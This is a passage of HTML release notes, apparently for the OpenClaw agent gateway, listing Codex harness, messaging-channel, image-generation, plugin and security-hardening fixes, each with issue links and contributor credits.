<li>Codex harness: add structured debug logging for embedded harness selection decisions so <code>/status</code> stays simple while gateway logs explain auto-selection and Pi fallback reasons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318523130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70760/hovercard" href="https://github.com/openclaw/openclaw/pull/70760">#70760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Codex harness: route native <code>request_user_input</code> prompts back to the originating chat, preserve queued follow-up answers, and honor newer app-server command approval amendment decisions.</li>
<li>Codex harness/context-engine: redact context-engine assembly failures before logging, so fallback warnings do not serialize raw error objects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319234861" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70809" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70809/hovercard" href="https://github.com/openclaw/openclaw/pull/70809">#70809</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>WhatsApp/onboarding: keep first-run setup entry loading off the Baileys runtime dependency path, so packaged QuickStart installs can show WhatsApp setup before runtime deps are staged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320441218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70932/hovercard" href="https://github.com/openclaw/openclaw/issues/70932">#70932</a>.</li>
<li>Block streaming: suppress final assembled text after partial block-delivery aborts when the already-sent text chunks exactly cover the final reply, preventing duplicate replies without dropping unrelated short messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320362931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70921/hovercard" href="https://github.com/openclaw/openclaw/issues/70921">#70921</a>.</li>
<li>Codex harness/Windows: resolve npm-installed <code>codex.cmd</code> shims through PATHEXT before starting the native app-server, so <code>codex/*</code> models work without a manual <code>.exe</code> shim. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320274139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70913" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70913/hovercard" href="https://github.com/openclaw/openclaw/issues/70913">#70913</a>.</li>
<li>Slack/groups: classify MPIM group DMs as group chat context and suppress verbose tool/plan progress on Slack non-DM surfaces, so internal "Working…" traces no longer leak into rooms. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320271144" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70912/hovercard" href="https://github.com/openclaw/openclaw/issues/70912">#70912</a>.</li>
<li>Agents/replay: stop OpenAI/Codex transcript replay from synthesizing missing tool results while still preserving synthetic repair on Anthropic, Gemini, and Bedrock transport-owned sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208825313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61556" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61556/hovercard" href="https://github.com/openclaw/openclaw/pull/61556">#61556</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VictorJeon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VictorJeon">@VictorJeon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram/media replies: parse remote markdown image syntax into outbound media payloads on the final reply path, so Telegram group chats stop falling back to plain-text image URLs when the model or a tool emits <code>![...](...)</code> instead of a <code>MEDIA:</code> token. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258333933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66191" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66191/hovercard" href="https://github.com/openclaw/openclaw/issues/66191">#66191</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apezam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apezam">@apezam</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/WebChat: surface non-retryable provider failures such as billing, auth, and rate-limit errors from the embedded runner instead of logging <code>surface_error</code> and leaving webchat with no rendered error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308345521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70124" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70124/hovercard" href="https://github.com/openclaw/openclaw/issues/70124">#70124</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319670589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70848" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70848/hovercard" href="https://github.com/openclaw/openclaw/pull/70848">#70848</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/truffle-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/truffle-dev">@truffle-dev</a>.</li>
<li>WhatsApp: unify outbound media normalization across direct sends and auto-replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Memory/CLI: declare the built-in <code>local</code> embedding provider in the memory-core manifest, so standalone <code>openclaw memory status</code>, <code>index</code>, and <code>search</code> can resolve local embeddings just like the gateway runtime. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319498725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70836" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70836/hovercard" href="https://github.com/openclaw/openclaw/issues/70836">#70836</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319903672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70873/hovercard" href="https://github.com/openclaw/openclaw/pull/70873">#70873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattznojassist/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattznojassist">@mattznojassist</a>.</li>
<li>Gateway/WebChat: preserve image attachments for text-only primary models by offloading them as media refs instead of dropping them, so configured image tools can still inspect the original file. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287666211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68513/hovercard" href="https://github.com/openclaw/openclaw/issues/68513">#68513</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066225308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44276" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44276/hovercard" href="https://github.com/openclaw/openclaw/issues/44276">#44276</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112734613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51656/hovercard" href="https://github.com/openclaw/openclaw/issues/51656">#51656</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309685353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70212/hovercard" href="https://github.com/openclaw/openclaw/issues/70212">#70212</a>.</li>
<li>Plugins/Google Meet: hang up delegated Twilio calls on leave, clean up Chrome realtime audio bridges when launch fails, and use a flat provider-safe tool schema.</li>
<li>Media understanding: honor explicit image-model configuration before native-vision skips, including <code>agents.defaults.imageModel</code>, <code>tools.media.image.models</code>, and provider image defaults such as MiniMax VL when the active chat model is text-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079114113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47614/hovercard" href="https://github.com/openclaw/openclaw/issues/47614">#47614</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231959911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63722" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63722/hovercard" href="https://github.com/openclaw/openclaw/issues/63722">#63722</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292840857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69171/hovercard" href="https://github.com/openclaw/openclaw/issues/69171">#69171</a>.</li>
<li>Codex/media understanding: support <code>codex/*</code> image models through bounded Codex app-server image turns, while keeping <code>openai-codex/*</code> on the OpenAI Codex OAuth route and validating app-server responses against generated protocol contracts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309522289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70201/hovercard" href="https://github.com/openclaw/openclaw/issues/70201">#70201</a>.</li>
<li>Providers/OpenAI Codex: synthesize the <code>openai-codex/gpt-5.5</code> OAuth model row when Codex catalog discovery omits it, so cron and subagent runs do not fail with <code>Unknown model</code> while the account is authenticated.</li>
<li>Models/Codex: preserve Codex provider metadata when adding models from chat or CLI commands, so manually added Codex models keep the right auth and routing behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319321563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70820/hovercard" href="https://github.com/openclaw/openclaw/pull/70820">#70820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Providers/OpenAI: route <code>openai/gpt-image-2</code> through configured Codex OAuth directly when an <code>openai-codex</code> profile is active, instead of probing <code>OPENAI_API_KEY</code> first.</li>
<li>Providers/OpenAI: harden image generation auth routing and Codex OAuth response parsing so fallback only applies to public OpenAI API routes and bounded SSE results. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>OpenAI/image generation: send reference-image edits as guarded multipart uploads instead of JSON data URLs, restoring complex multi-reference <code>gpt-image-2</code> edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316931305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70642/hovercard" href="https://github.com/openclaw/openclaw/issues/70642">#70642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dashhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dashhuang">@dashhuang</a>.</li>
<li>Providers/OpenRouter: send image-understanding prompts as user text before image parts, restoring non-empty vision responses for OpenRouter multimodal models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312662772" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70410/hovercard" href="https://github.com/openclaw/openclaw/issues/70410">#70410</a>.</li>
<li>Providers/Google: honor the private-network SSRF opt-in for Gemini image generation requests, so trusted proxy setups that resolve Google API hosts to private addresses can use <code>image_generate</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269431435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67216/hovercard" href="https://github.com/openclaw/openclaw/issues/67216">#67216</a>.</li>
<li>Agents/transport: stop embedded runs from lowering the process-wide undici stream timeouts, so slow Gemini image generation and other long-running provider requests no longer inherit short run-attempt headers timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312763316" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70423/hovercard" href="https://github.com/openclaw/openclaw/issues/70423">#70423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>Providers/OpenAI: honor the private-network SSRF opt-in for OpenAI-compatible image generation endpoints, so trusted LocalAI/LAN <code>image_generate</code> routes work without disabling SSRF checks globally. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221864091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62879/hovercard" href="https://github.com/openclaw/openclaw/issues/62879">#62879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/seitzbg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/seitzbg">@seitzbg</a>.</li>
<li>Providers/OpenAI: stop advertising the removed <code>gpt-5.3-codex-spark</code> Codex model through fallback catalogs, and suppress stale rows with a GPT-5.5 recovery hint.</li>
<li>Control UI/chat: persist assistant-generated images as authenticated managed media and accept paired-device tokens for assistant media fetches, so webchat history reloads keep showing generated images. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317927968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70719" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70719/hovercard" href="https://github.com/openclaw/openclaw/pull/70719">#70719</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318227484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70741/hovercard" href="https://github.com/openclaw/openclaw/pull/70741">#70741</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Control UI/chat: queue Stop-button aborts across Gateway reconnects so a disconnected active run is canceled on reconnect instead of only clearing local UI state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317304097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70673/hovercard" href="https://github.com/openclaw/openclaw/pull/70673">#70673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Memory/QMD: recreate stale managed QMD collections when startup repair finds the collection name already exists, so root memory narrows back to <code>MEMORY.md</code> instead of staying on broad workspace markdown indexing.</li>
<li>Agents/OpenAI: surface selected-model capacity failures from PI, Codex, and auto-reply harness paths with a model-switch hint instead of the generic empty-response error. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QR: replace legacy <code>qrcode-terminal</code> QR rendering with bounded <code>qrcode-tui</code> helpers for plugin login/setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255382870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65969" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65969/hovercard" href="https://github.com/openclaw/openclaw/pull/65969">#65969</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Voice-call/realtime: wait for OpenAI session configuration before greeting or forwarding buffered audio, and reject non-allowlisted Twilio callers before stream setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061033395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43501/hovercard" href="https://github.com/openclaw/openclaw/pull/43501">#43501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/forrestblount/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/forrestblount">@forrestblount</a>.</li>
<li>ACPX/Codex: stop materializing <code>auth.json</code> bridge files for Codex ACP, Codex app-server, and Codex CLI runs; Codex-owned runtimes now use their normal <code>CODEX_HOME</code>/<code>~/.codex</code> auth path directly.</li>
<li>Auto-reply/system events: route async exec-event completion replies through the persisted session delivery context, so long-running command results return to the originating channel instead of being dropped when live origin metadata is missing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310392062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70258/hovercard" href="https://github.com/openclaw/openclaw/pull/70258">#70258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wzfukui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wzfukui">@wzfukui</a>.</li>
<li>Gateway/sessions: extend the webchat session-mutation guard to <code>sessions.compact</code> and <code>sessions.compaction.restore</code>, so <code>WEBCHAT_UI</code> clients are rejected from compaction-side session mutations consistently with the existing patch/delete guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317846623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70716/hovercard" href="https://github.com/openclaw/openclaw/pull/70716">#70716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>QA channel/security: reject non-HTTP(S) inbound attachment URLs before media fetch, and log rejected schemes so suspicious or misconfigured payloads are visible during debugging. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317761421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70708/hovercard" href="https://github.com/openclaw/openclaw/pull/70708">#70708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: link the host OpenClaw package into external plugins that declare <code>openclaw</code> as a peer dependency, so peer-only plugin SDK imports resolve after install without bundling a duplicate host package. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313294513" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70462" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70462/hovercard" href="https://github.com/openclaw/openclaw/pull/70462">#70462</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anishesg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anishesg">@anishesg</a>.</li>
<li>Plugins/Windows: refresh the packaged plugin SDK alias in place during bundled runtime dependency repair, so gateway and CLI plugin startup no longer race on <code>ENOTEMPTY</code>/<code>EPERM</code> after same-guest npm updates.</li>
<li>Teams/security: require shared Bot Framework audience tokens to name the configured Teams app via verified <code>appid</code> or <code>azp</code>, blocking cross-bot token replay on the global audience. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317946331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70724/hovercard" href="https://github.com/openclaw/openclaw/pull/70724">#70724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: resolve bundled plugin Jiti loads relative to the target plugin module instead of the central loader, so Bun global installs no longer hang while discovering bundled image providers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307757270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70073/hovercard" href="https://github.com/openclaw/openclaw/pull/70073">#70073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yidianyiko/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yidianyiko">@yidianyiko</a>.</li>
<li>Anthropic/CLI security: derive Claude CLI <code>bypassPermissions</code> from OpenClaw's existing YOLO exec policy, preserve explicit raw Claude <code>--permission-mode</code> overrides, and strip malformed permission-mode args instead of silently falling back to a bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317943033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70723/hovercard" href="https://github.com/openclaw/openclaw/pull/70723">#70723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: require loopback-only cleartext gateway connections on Android manual and scanned routes, so private-LAN and link-local <code>ws://</code> endpoints now fail closed unless TLS is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317940763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70722/hovercard" href="https://github.com/openclaw/openclaw/pull/70722">#70722</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Pairing/security: require private-IP or loopback hosts for cleartext mobile pairing, and stop treating <code>.local</code> or dotless hostnames as safe cleartext endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317933544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70721/hovercard" href="https://github.com/openclaw/openclaw/pull/70721">#70721</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/security: stop setup-api lookup from falling back to the launch directory, so workspace-local <code>extensions/&lt;plugin&gt;/setup-api.*</code> files cannot be executed during provider setup resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317905776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70718/hovercard" href="https://github.com/openclaw/openclaw/pull/70718">#70718</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Approvals/security: require explicit chat exec-approval enablement instead of auto-enabling approval clients just because approvers resolve from config or owner allowlists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317765259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70715/hovercard" href="https://github.com/openclaw/openclaw/pull/70715">#70715</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/security: keep native slash-command channel policy from bypassing configured owner or member restrictions, while preserving channel-policy fallback when no stricter access rule exists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317763069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70711" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70711/hovercard" href="https://github.com/openclaw/openclaw/pull/70711">#70711</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: stop <code>ASK_OPENCLAW</code> intents from auto-sending injected prompts, so external app actions only prefill the draft instead of dispatching it immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317764736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70714/hovercard" href="https://github.com/openclaw/openclaw/pull/70714">#70714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Secrets/Windows: strip UTF-8 BOMs from file-backed secrets and keep unavailable ACL checks fail-closed unless trusted file or exec providers explicitly opt into <code>allowInsecurePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317129545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70662" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70662/hovercard" href="https://github.com/openclaw/openclaw/pull/70662">#70662</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>Agents/image generation: escape ignored override values in tool warnings so parsed <code>MEDIA:</code> directives cannot be injected through unsupported model options. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317762579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70710" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70710/hovercard" href="https://github.com/openclaw/openclaw/pull/70710">#70710</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot/security: require framework auth for <code>/bot-approve</code> so unauthorized QQ senders cannot change exec approval settings through the unauthenticated pre-dispatch slash-command path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317735442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70706/hovercard" href="https://github.com/openclaw/openclaw/pull/70706">#70706</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
